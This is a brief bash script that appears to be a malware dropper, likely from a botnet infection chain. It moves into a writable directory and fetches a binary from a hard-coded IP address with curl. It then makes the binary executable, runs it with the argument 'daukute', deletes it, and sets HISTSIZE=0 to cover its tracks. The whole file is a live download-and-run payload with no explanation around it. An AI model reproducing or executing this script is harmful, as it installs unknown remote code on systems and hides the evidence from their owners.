#!/usr/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && curl -OL http://103.183.118.73/x86_64 && chmod 777 x86_64 && ./x86_64 daukute && rm -rf x86_64 && cd /root/ && clear && HISTSIZE=0 && exit

